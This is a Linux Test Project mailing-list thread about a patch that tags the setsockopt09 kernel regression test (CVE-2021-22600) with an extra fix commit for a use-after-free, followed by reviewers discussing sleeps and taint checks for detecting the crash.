[LTP] [PATCH] syscalls/setsockopt09: Add another linux git

[LTP] [PATCH] syscalls/setsockopt09: Add another linux git

[Yang Xu]

On centos7.9ga, I still hit another crash problem because of use-after-free in
prb_retire_rx_blk_timer_expired(). Since we free it when timer expired, so this
case will crash after we print TPASS info.

Signed-off-by: Yang Xu <xuyang2018.jy@fujitsu.com>
---
 testcases/kernel/syscalls/setsockopt/setsockopt09.c | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/testcases/kernel/syscalls/setsockopt/setsockopt09.c b/testcases/kernel/syscalls/setsockopt/setsockopt09.c
index 2fc66ebbc..62c6dea07 100644
--- a/testcases/kernel/syscalls/setsockopt/setsockopt09.c
+++ b/testcases/kernel/syscalls/setsockopt/setsockopt09.c
@@ -19,6 +19,17 @@
  *
  *  net/packet: rx_owner_map depends on pg_vec
  *
+ * It also triggers another use-after-free problem in
+ * prb_retire_rx_blk_timer_expired.
+ *
+ * Kernel crash fixed in:
+ *
+ * commit c800aaf8d869f2b9b47b10c5c312fe19f0a94042
+ * Author: WANG Cong <xiyou.wangcong@gmail.com>
+ * Date:   Mon Jul 24 10:07:32 2017 -0700
+ *
+ * packet: fix use-after-free in prb_retire_rx_blk_timer_expired()
+ *
  */
 
 #define _GNU_SOURCE
@@ -110,6 +121,7 @@ static struct tst_test test = {
 		NULL,
 	},
 	.tags = (const struct tst_tag[]) {
+		{"linux-git", "c800aaf8d869"},
 		{"linux-git", "ec6af094ea28"},
 		{"CVE", "2021-22600"},
 		{}
-- 
2.23.0


-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git

[xuyang2018.jy]

Hi All
> On centos7.9ga, I still hit another crash problem because of use-after-free in
> prb_retire_rx_blk_timer_expired(). Since we free it when timer expired, so this	
Using free is incorrect, should modify as below:
Since we still use the freed resource when timer expired

Best Regards
Yang Xu
> case will crash after we print TPASS info.
> 
> Signed-off-by: Yang Xu<xuyang2018.jy@fujitsu.com>
> ---
>   testcases/kernel/syscalls/setsockopt/setsockopt09.c | 12 ++++++++++++
>   1 file changed, 12 insertions(+)
> 
> diff --git a/testcases/kernel/syscalls/setsockopt/setsockopt09.c b/testcases/kernel/syscalls/setsockopt/setsockopt09.c
> index 2fc66ebbc..62c6dea07 100644
> --- a/testcases/kernel/syscalls/setsockopt/setsockopt09.c
> +++ b/testcases/kernel/syscalls/setsockopt/setsockopt09.c
> @@ -19,6 +19,17 @@
>    *
>    *  net/packet: rx_owner_map depends on pg_vec
>    *
> + * It also triggers another use-after-free problem in
> + * prb_retire_rx_blk_timer_expired.
> + *
> + * Kernel crash fixed in:
> + *
> + * commit c800aaf8d869f2b9b47b10c5c312fe19f0a94042
> + * Author: WANG Cong<xiyou.wangcong@gmail.com>
> + * Date:   Mon Jul 24 10:07:32 2017 -0700
> + *
> + * packet: fix use-after-free in prb_retire_rx_blk_timer_expired()
> + *
>    */
> 
>   #define _GNU_SOURCE
> @@ -110,6 +121,7 @@ static struct tst_test test = {
>   		NULL,
>   	},
>   	.tags = (const struct tst_tag[]) {
> +		{"linux-git", "c800aaf8d869"},
>   		{"linux-git", "ec6af094ea28"},
>   		{"CVE", "2021-22600"},
>   		{}

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git

[Petr Vorel]

Hi Xu,

> On centos7.9ga, I still hit another crash problem because of use-after-free in
> prb_retire_rx_blk_timer_expired(). Since we free it when timer expired, so this
> case will crash after we print TPASS info.

Reviewed-by: Petr Vorel <pvorel@suse.cz>

LGTM.
I tested two old kernels, the one with patch survives, the other got reboot.

BTW funny enough the affected system manages to print "TPASS: Nothing bad
happened, probably" before reboot :).

Kind regards,
Petr

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git

[xuyang2018.jy]

Hi Petr
> Hi Xu,
>
>> On centos7.9ga, I still hit another crash problem because of use-after-free in
>> prb_retire_rx_blk_timer_expired(). Since we free it when timer expired, so this
>> case will crash after we print TPASS info.
>
> Reviewed-by: Petr Vorel<pvorel@suse.cz>
>
> LGTM.
> I tested two old kernels, the one with patch survives, the other got reboot.
>
> BTW funny enough the affected system manages to print "TPASS: Nothing bad
> happened, probably" before reboot :).
Yes, it crash when timer expired, so it will print TPASS before reboot. 
Also, I try sleep 10ms, but it still print TPASS and reboot after serval 
seconds.

I have wrote it in my commit message, so this should  be friendly for 
user to know this situation.

Best Regards
Yang Xu
>
> Kind regards,
> Petr

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git

[Petr Vorel]

> Hi Petr
> > Hi Xu,

> >> On centos7.9ga, I still hit another crash problem because of use-after-free in
> >> prb_retire_rx_blk_timer_expired(). Since we free it when timer expired, so this
> >> case will crash after we print TPASS info.

> > Reviewed-by: Petr Vorel<pvorel@suse.cz>

> > LGTM.
> > I tested two old kernels, the one with patch survives, the other got reboot.

> > BTW funny enough the affected system manages to print "TPASS: Nothing bad
> > happened, probably" before reboot :).
> Yes, it crash when timer expired, so it will print TPASS before reboot. 
> Also, I try sleep 10ms, but it still print TPASS and reboot after serval 
> seconds.

> I have wrote it in my commit message, so this should  be friendly for 
> user to know this situation.

Sure, I didn't expect we would be able to fix this (I'm *not* voting for sleep
10+ s). It can just be a bit confusing when you read test logs if the framework
does not clearly show that system got rebooted (I saw reset in dmesg but didn't
believe it's caused by this test output due TPASS. Lesson learned :)).

Kind regards,
Petr

> Best Regards
> Yang Xu

> > Kind regards,
> > Petr

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git

[xuyang2018.jy]

Hi Petr
>> Hi Petr
>>> Hi Xu,
>
>>>> On centos7.9ga, I still hit another crash problem because of use-after-free in
>>>> prb_retire_rx_blk_timer_expired(). Since we free it when timer expired, so this
>>>> case will crash after we print TPASS info.
>
>>> Reviewed-by: Petr Vorel<pvorel@suse.cz>
>
>>> LGTM.
>>> I tested two old kernels, the one with patch survives, the other got reboot.
>
>>> BTW funny enough the affected system manages to print "TPASS: Nothing bad
>>> happened, probably" before reboot :).
>> Yes, it crash when timer expired, so it will print TPASS before reboot.
>> Also, I try sleep 10ms, but it still print TPASS and reboot after serval
>> seconds.
>
>> I have wrote it in my commit message, so this should  be friendly for
>> user to know this situation.
>
> Sure, I didn't expect we would be able to fix this (I'm *not* voting for sleep
> 10+ s). It can just be a bit confusing when you read test logs if the framework
> does not clearly show that system got rebooted (I saw reset in dmesg but didn't
> believe it's caused by this test output due TPASS. Lesson learned :)).
Yes, it looks confused.

So, how about testing 100 times in runtest/syscall and runtest/cve like 
"cve-2021-22555 setsockopt08 -i 100" does.

ps: I tested it on old kernel and it works well.

Best Regards
Yang Xu
>
> Kind regards,
> Petr
>
>> Best Regards
>> Yang Xu
>
>>> Kind regards,
>>> Petr

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git

[Martin Doucha]

On 04. 03. 22 4:24, xuyang2018.jy@fujitsu.com wrote:
> Hi Petr
>> Hi Xu,
>>
>>> On centos7.9ga, I still hit another crash problem because of use-after-free in
>>> prb_retire_rx_blk_timer_expired(). Since we free it when timer expired, so this
>>> case will crash after we print TPASS info.
>>
>> Reviewed-by: Petr Vorel<pvorel@suse.cz>
>>
>> LGTM.
>> I tested two old kernels, the one with patch survives, the other got reboot.
>>
>> BTW funny enough the affected system manages to print "TPASS: Nothing bad
>> happened, probably" before reboot :).
> Yes, it crash when timer expired, so it will print TPASS before reboot. 
> Also, I try sleep 10ms, but it still print TPASS and reboot after serval 
> seconds.

The timeout is controlled by req.tp_retire_blk_tov and the value is in
milliseconds. So usleep(req.tp_retire_blk_tov * 3000) should be enough.

-- 
Martin Doucha   mdoucha@suse.cz
QA Engineer for Software Maintenance
SUSE LINUX, s.r.o.
CORSO IIa
Krizikova 148/34
186 00 Prague 8
Czech Republic

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git

[xuyang2018.jy]

Hi Martin
> On 04. 03. 22 4:24, xuyang2018.jy@fujitsu.com wrote:
>> Hi Petr
>>> Hi Xu,
>>>
>>>> On centos7.9ga, I still hit another crash problem because of use-after-free in
>>>> prb_retire_rx_blk_timer_expired(). Since we free it when timer expired, so this
>>>> case will crash after we print TPASS info.
>>>
>>> Reviewed-by: Petr Vorel<pvorel@suse.cz>
>>>
>>> LGTM.
>>> I tested two old kernels, the one with patch survives, the other got reboot.
>>>
>>> BTW funny enough the affected system manages to print "TPASS: Nothing bad
>>> happened, probably" before reboot :).
>> Yes, it crash when timer expired, so it will print TPASS before reboot.
>> Also, I try sleep 10ms, but it still print TPASS and reboot after serval
>> seconds.
>
> The timeout is controlled by req.tp_retire_blk_tov and the value is in
> milliseconds. So usleep(req.tp_retire_blk_tov * 3000) should be enough.
I tested this on my vm, it still can't ensure hit the old crash before 
print PASS log.

Best Regards
Yang Xu
>

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git

[Martin Doucha]

On 09. 03. 22 3:03, xuyang2018.jy@fujitsu.com wrote:
> Hi Martin
>> The timeout is controlled by req.tp_retire_blk_tov and the value is in
>> milliseconds. So usleep(req.tp_retire_blk_tov * 3000) should be enough.
> I tested this on my vm, it still can't ensure hit the old crash before 
> print PASS log.

That is probably expected. You'll need make a taint check after the
usleep() to detect failure. See setsockopt06 which tests for similar
use-after-free in socket timer.

-- 
Martin Doucha   mdoucha@suse.cz
QA Engineer for Software Maintenance
SUSE LINUX, s.r.o.
CORSO IIa
Krizikova 148/34
186 00 Prague 8
Czech Republic

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp

Re: [LTP] [PATCH] syscalls/setsockopt09: Add another linux git

[xuyang2018.jy]

Hi Martin
> On 09. 03. 22 3:03, xuyang2018.jy@fujitsu.com wrote:
>> Hi Martin
>>> The timeout is controlled by req.tp_retire_blk_tov and the value is in
>>> milliseconds. So usleep(req.tp_retire_blk_tov * 3000) should be enough.
>> I tested this on my vm, it still can't ensure hit the old crash before
>> print PASS log.
>
> That is probably expected. You'll need make a taint check after the
> usleep() to detect failure. See setsockopt06 which tests for similar
> use-after-free in socket timer.

I add a sleep ie setsockopt06, but it doesn't detect the kernel tainted 
state in time and doesn't report "Kernel is vulnerable".

Best Regards
Yang Xu
>

-- 
Mailing list info: https://lists.linux.it/listinfo/ltp